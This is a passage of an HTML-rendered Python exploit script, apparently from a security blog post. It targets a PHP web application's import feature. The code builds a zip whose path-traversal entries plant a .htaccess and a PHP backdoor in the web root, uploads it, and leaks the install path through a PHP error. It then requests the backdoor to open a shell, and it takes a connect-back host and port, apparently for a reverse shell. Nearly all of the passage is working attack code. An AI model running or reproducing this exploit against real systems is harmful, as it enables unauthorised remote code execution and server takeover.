class=\"crayon-s\">&#8220;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-591b7aecb0fa1726489437-128\"><span class=\"crayon-s\">&nbsp;&nbsp;&nbsp;&nbsp;builds the zip file.<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-591b7aecb0fa1726489437-129\"><span class=\"crayon-s\">&nbsp;&nbsp;&nbsp;&nbsp;we upload a .htaccess incase the webserver doesnt have <\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-591b7aecb0fa1726489437-130\"><span class=\"crayon-s\">&nbsp;&nbsp;&nbsp;&nbsp;a handler for phtml extensions but typically, they do.<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-591b7aecb0fa1726489437-131\"><span class=\"crayon-s\">&nbsp;&nbsp;&nbsp;&nbsp;&#8220;<\/span><span class=\"crayon-s\">&#8220;&#8221;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-591b7aecb0fa1726489437-132\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">f<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">StringIO<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-591b7aecb0fa1726489437-133\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">z<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">zipfile<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">ZipFile<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">f<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8216;w&#8217;<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">zipfile<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">ZIP_DEFLATED<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-591b7aecb0fa1726489437-134\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">z<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">writestr<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8216;..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..%shome\/.htaccess&#8217;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">%<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">fp<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;AddType application\/x-httpd-php .phtml&#8221;<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-591b7aecb0fa1726489437-135\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">z<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">writestr<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8216;..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..%shome\/si.phtml&#8217;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">%<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">fp<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">_build_php_code<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-591b7aecb0fa1726489437-136\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">z<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">close<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-591b7aecb0fa1726489437-137\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">handle<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">open<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8216;pwn.zip&#8217;<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-s\">&#8216;wb&#8217;<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-591b7aecb0fa1726489437-138\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">handle<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">write<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">f<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">getvalue<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-591b7aecb0fa1726489437-139\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">handle<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">close<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-591b7aecb0fa1726489437-140\"><span class=\"crayon-e\"> <\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-591b7aecb0fa1726489437-141\"><span class=\"crayon-e\">def <\/span><span class=\"crayon-e\">we_can_upload_a_shell<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-591b7aecb0fa1726489437-142\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-s\">&#8220;&#8221;<\/span><span class=\"crayon-s\">&#8220;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-591b7aecb0fa1726489437-143\"><span class=\"crayon-s\">&nbsp;&nbsp;&nbsp;&nbsp;uploads a zip file with php code inside to our target for exploitation<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-591b7aecb0fa1726489437-144\"><span class=\"crayon-s\">&nbsp;&nbsp;&nbsp;&nbsp;&#8220;<\/span><span class=\"crayon-s\">&#8220;&#8221;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-591b7aecb0fa1726489437-145\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">_build_zip<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-591b7aecb0fa1726489437-146\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">multiple_files<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-591b7aecb0fa1726489437-147\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-s\">&#8216;allow_test_import&#8217;<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">None<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8216;1&#8217;<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-591b7aecb0fa1726489437-148\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-s\">&#8216;allow_a4a_import&#8217;<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">None<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8216;1&#8217;<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">,<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-591b7aecb0fa1726489437-149\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-s\">&#8216;file&#8217;<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8216;pwn.zip&#8217;<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">open<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8216;pwn.zip&#8217;<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-s\">&#8216;rb&#8217;<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8216;application\/zip&#8217;<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">,<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-591b7aecb0fa1726489437-150\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-s\">&#8216;submit&#8217;<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">None<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8216;Import&#8217;<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-591b7aecb0fa1726489437-151\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-sy\">}<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-591b7aecb0fa1726489437-152\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">proxies<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><span class=\"crayon-s\">&#8220;http&#8221;<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-s\">&#8220;http:\/\/127.0.0.1:8080&#8221;<\/span><span class=\"crayon-sy\">}<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-591b7aecb0fa1726489437-153\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">r<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">s<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">post<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;http:\/\/%s\/home\/ims\/ims_import.php&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">%<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">target<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">files<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-v\">multiple_files<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">allow_redirects<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-t\">False<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">proxies<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-v\">proxies<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-591b7aecb0fa1726489437-154\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-591b7aecb0fa1726489437-155\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">if<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">r<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">status_code<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">==<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">302<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-591b7aecb0fa1726489437-156\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">return<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-t\">True<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-591b7aecb0fa1726489437-157\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">return<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-t\">False<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-591b7aecb0fa1726489437-158\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-591b7aecb0fa1726489437-159\"><span class=\"crayon-e\">def <\/span><span class=\"crayon-e\">_clean_up<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-591b7aecb0fa1726489437-160\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">os<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">remove<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;pwn.zip&#8221;<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-591b7aecb0fa1726489437-161\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-591b7aecb0fa1726489437-162\"><span class=\"crayon-e\">def <\/span><span class=\"crayon-e\">pop_shell<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-591b7aecb0fa1726489437-163\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-s\">&#8220;&#8221;<\/span><span class=\"crayon-s\">&#8220;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-591b7aecb0fa1726489437-164\"><span class=\"crayon-s\">&nbsp;&nbsp;&nbsp;&nbsp;pops a shell by making a request to the backdoor code<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-591b7aecb0fa1726489437-165\"><span class=\"crayon-s\">&nbsp;&nbsp;&nbsp;&nbsp;&#8220;<\/span><span class=\"crayon-s\">&#8220;&#8221;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-591b7aecb0fa1726489437-166\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">_clean_up<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-591b7aecb0fa1726489437-167\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">try<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-591b7aecb0fa1726489437-168\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">r<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">s<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">get<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;http:\/\/%s\/home\/si.phtml&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">%<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">target<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-591b7aecb0fa1726489437-169\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">except<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-591b7aecb0fa1726489437-170\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">pass<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-591b7aecb0fa1726489437-171\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-591b7aecb0fa1726489437-172\"><span class=\"crayon-e\">def <\/span><span class=\"crayon-e\">we_can_get_fp<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-591b7aecb0fa1726489437-173\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-s\">&#8220;&#8221;<\/span><span class=\"crayon-s\">&#8220;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-591b7aecb0fa1726489437-174\"><span class=\"crayon-s\">&nbsp;&nbsp;&nbsp;&nbsp;gets the full path<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-591b7aecb0fa1726489437-175\"><span class=\"crayon-s\">&nbsp;&nbsp;&nbsp;&nbsp;requires some php.ini settings:<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-591b7aecb0fa1726489437-176\"><span class=\"crayon-s\">&nbsp;&nbsp;&nbsp;&nbsp;display_errors = On<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-591b7aecb0fa1726489437-177\"><span class=\"crayon-s\">&nbsp;&nbsp;&nbsp;&nbsp;&#8220;<\/span><span class=\"crayon-s\">&#8220;&#8221;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-591b7aecb0fa1726489437-178\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-m\">global<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">fp<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-591b7aecb0fa1726489437-179\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">r<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">s<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">get<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;http:\/\/%s\/documentation\/index.php?p[]=&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">%<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">target<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-591b7aecb0fa1726489437-180\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">match<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">re<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">search<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;array given in &lt;b&gt;\/(.*)documentation\/index.php&lt;\/b&gt; &#8220;<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">r<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">text<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-591b7aecb0fa1726489437-181\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">if<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">match<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-591b7aecb0fa1726489437-182\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">fp<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;\/%s&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">%<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">match<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">group<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-cn\">1<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-591b7aecb0fa1726489437-183\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">return<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-t\">True<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-591b7aecb0fa1726489437-184\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">return<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-t\">False<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-591b7aecb0fa1726489437-185\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-591b7aecb0fa1726489437-186\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-591b7aecb0fa1726489437-187\"><span class=\"crayon-e\">def <\/span><span class=\"crayon-e\">validation_of_args_are_good<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-591b7aecb0fa1726489437-188\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-s\">&#8220;&#8221;<\/span><span class=\"crayon-s\">&#8220;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-591b7aecb0fa1726489437-189\"><span class=\"crayon-s\">&nbsp;&nbsp;&nbsp;&nbsp;validates where the arguments are good or not<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-591b7aecb0fa1726489437-190\"><span class=\"crayon-s\">&nbsp;&nbsp;&nbsp;&nbsp;&#8220;<\/span><span class=\"crayon-s\">&#8220;&#8221;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-591b7aecb0fa1726489437-191\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-m\">global<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">target<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">cb_host<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">cb_port<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">username<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">password<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">w_lst<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">help_str<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-591b7aecb0fa1726489437-192\"><span class=\"crayon-e\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">help_str<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;%s &lt;target&gt; &lt;author user:pass&gt; &lt;connectback host:port&gt;&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">%<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">sys<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">argv<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-sy\">]<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-591b7aecb0fa1726489437-193\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">if<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">len<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">sys<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">argv<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">4<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-591b7aecb0fa1726489437-194\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">print <\/span><span class=\"crayon-e\">help_str<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-591b7aecb0fa1726489437-195\"><span class=\"crayon-e\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">sys<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">exit<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-cn\">1<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-591b7aecb0fa1726489437-196\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">target<\/span><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">sys<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">argv<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-cn\">1<\/span><span class=\"crayon-sy\">]<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-591b7aecb0fa1726489437-197\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">user_pass<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">sys<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">argv<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-cn\">2<\/span><span class=\"crayon-sy\">]<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-591b7aecb0fa1726489437-198\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">host_port<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">sys<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">argv<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-cn\">3<\/span><span class=\"crayon-sy\">]<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-591b7aecb0fa1726489437-199\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">if<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;:&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-st\">not<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-st\">in<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">host_port<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div 